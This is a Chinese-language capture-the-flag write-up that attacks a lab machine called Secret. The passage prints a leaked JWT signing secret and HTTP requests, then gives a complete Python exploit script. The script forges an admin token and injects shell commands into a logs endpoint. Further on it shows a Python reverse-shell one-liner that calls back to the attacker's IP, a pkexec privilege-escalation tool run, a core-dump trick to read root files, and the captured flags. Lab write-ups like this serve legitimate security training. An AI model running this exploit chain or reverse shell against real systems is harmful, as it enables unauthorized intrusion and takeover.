[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…

2025-02-25 7 0

Information Gathering

IP Address Opening Ports
10.10.11.120 TCP:22,80,3000

$ ip='10.10.11.120'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 97af61441089b953f0803fd719b1e29c (RSA)
|   256 95ed658dcd082b55dd1751311e3e1812 (ECDSA)
|_  256 337bc171d3330f924e835a1f5202935e (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open  http    Node.js (Express middleware)
|_http-title: DUMB Docs
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

DUMB Docs .Git leak && API && JWT && Command Injection

http://10.10.11.120/

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图

http://10.10.11.120/download/files.zip

$ unzip files.zip

$ git log -p

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图1

TOKEN_SECRET:gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE

当用户名为theadmin时,再次传入文件名...存在命令注入

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图2

$ grep -R jwt

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图3

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图4

获取JWT生成条件的URL路径

$ cat index.js

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图5

$ grep -R /api/user

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图6

POST /api/user/register HTTP/1.1
Host: 10.10.11.120:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"3248-nFUp1XavqYRgAFgHenjOsSPQ/e4"
Content-Length: 74
Content-Type: application/json

{
"name":"maptnh",
"email":"maptnh@gmail.com",
"password":"maptnh"
}

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图7

POST /api/user/login HTTP/1.1
Host: 10.10.11.120:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"3248-nFUp1XavqYRgAFgHenjOsSPQ/e4"
Content-Length: 56
Content-Type: application/json

{
"email":"maptnh@gmail.com",
"password":"maptnh"
}

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图8

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图9

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2N2JiM2EyMmM0ODYwMTA0NWE1NmQ1OWIiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im1hcHRuaEBnbWFpbC5jb20iLCJpYXQiOjE3NDAzMjM0ODN9.PM1w5t5wwx4C4Qp8V35d2e7a7u0q1MDh38OsKCMPtZw

GET /api/logs?file=1 HTTP/1.1
Host: 10.10.11.120:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiI2N2JiM2EyMmM0ODYwMTA0NWE1NmQ1OWIiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6Im1hcHRuaEBnbWFpbC5jb20iLCJpYXQiOjE3NDAzMjM4ODF9.oiQ7Ohvr4ASuCCmdC-XKCB9Ywj3Zmdm-QvPEUxgD8JEs
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/"3248-nFUp1XavqYRgAFgHenjOsSPQ/e4"
Content-Length: 1

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图10

TOOL

# @Maptnh
import requests
import jwt
import json
import sys

if len(sys.argv) != 3:
    print(f"Usage: python {sys.argv[0]} <BASE_URL> <COMMAND>")
    sys.exit(1)

BASE_URL = sys.argv[1]
command = sys.argv[2]

HEADERS = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/112.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1",
    "Content-Type": "application/json"
}

register_data = {
    "name": "maptnh",
    "email": "maptnh@gmail.com",
    "password": "maptnh"
}

register_response = requests.post(f"{BASE_URL}/api/user/register", json=register_data, headers=HEADERS)

if 'Email' in register_response.text:
    print(f"[*] User already Exist")
else:
    print("[+] User created successfully")

login_data = {
    "email": "maptnh@gmail.com",
    "password": "maptnh"
}
login_response = requests.post(f"{BASE_URL}/api/user/login", json=login_data, headers=HEADERS)
    
if login_response.status_code == 200:
    auth_token = login_response.headers.get("auth-token")

    if auth_token:
 
        decoded_token = jwt.decode(auth_token, options={"verify_signature": False})
        decoded_token["name"] = "theadmin"

        SECRET_KEY = "gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE"
        new_token = jwt.encode(decoded_token, SECRET_KEY, algorithm="HS256")

        get_headers = HEADERS.copy()
        get_headers["auth-token"] = new_token
        print("[+] Created JWT successfully")
        get_response = requests.get(f"{BASE_URL}/api/logs?file=1;{command}", headers=get_headers)
        print(f"[+] GET response:")
        print(get_response.text.strip())
    else:
        print("[!] Auth Token not found in response!")
else:
    print(f"[!] Login failed: {login_response.text}")

$ python3 exp.py http://10.10.11.120:3000 dir

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图11

$ python3 exp.py http://10.10.11.120:3000 "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.16.25\",10031));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn(\"/bin/bash\")'"

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图12

User.txt

da2c7d1f1b155b171c469d4cb20214b6

TRP00F

$ python3 trp00f.py --lhost 10.10.16.25 --lport 10000 --rhost 10.10.16.25 --rport 10032 --http 9999

[!] Do you want to exploit the vulnerability in file ‘pkexec’ ? (y/n) >y

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图13

Privilege Escalation:prctl dump process

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图14

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图15

在源代码中,无法尝试进行BOF利用。其中在scanf("%99s", path);的第99个字符强制插入00空字符截断。

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图16

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图17

在prctl(PR_SET_DUMPABLE, 1)存在问题

当 prctl(PR_SET_DUMPABLE, 1) 被设置后,进程在以下情况下会生成核心转储文件:
进程异常终止:当进程接收到某些信号(如 SIGSEGV、SIGABRT、SIGFPE 等)导致异常终止时,内核会触发核心转储。
资源限制允许:进程的资源限制(如 RLIMIT_CORE)必须允许生成核心转储文件。如果 RLIMIT_CORE 被设置为 0,则不会生成核心转储。
文件系统权限:进程对目标存储目录必须有写权限,且文件系统未被只读挂载。
非特权程序:对于设置了 SUID 或 SGID 的程序,核心转储默认被禁用。但如果通过 prctl(PR_SET_DUMPABLE, 1) 明确允许,或者系统通过 /proc/sys/fs/suid_dumpable 配置允许,则可以生成核心转储。

意味着kill命令参数使用-6,-8,-11即可触发转存储

$ ps -aux | grep count

$ kill -6 107613

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图18

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图19

$ apport-unpack /var/crash/_opt_count.1000.crash /tmp/res

$ cat /tmp/res/CoreDump

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图20

[Meachines] [Easy] Secret DUMB Docs .Git Leak+JWT+RCE+TRP00F权限提升+prctl函数转存储…插图21

Root.txt

2afe145641cd410148ca775633e8584e

相关文章:

  1. [Meachines] [Medium] Compiled Git-RCE+Visual Studio 2019权限提升
  2. [Meachines] [Easy] Previse EAR+Php files analysis RCE+TRP00F权限提升+Gzip路径劫持权限…
  3. [Meachines] [Easy] Academy Laravel-RCE+TRP00F权限提升+audit服务日志权限提升+composer权限提…
  4. [Meachines] [Easy] LinkVortex Git leakage+Ghost 5.58+Double Link Bypass权限提升
  5. [Meachines] [Easy] Pandora SNMP+TRP00F权限提升+ktor-HTTP服务扫描+Pandora Fms SQLI-R…

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

Xeno RAT:一种具备高级功能的新型远程访问木马
Windows图形化应急分析工具-Hawkeye
[Meachines] [Easy] Inject LFI && Spring Cloud RCE+Ansible playbook权限提升
[Meachines] [Easy] ScriptKiddie Msfvenom RCE+TRP00F权限提升+Shell -d 命令注入+msfco…
抓包技术->APP|小程序|PC应用|WEB&转发联动&HTTPS协议
对抗沙箱的非常规手法深度解析

发布评论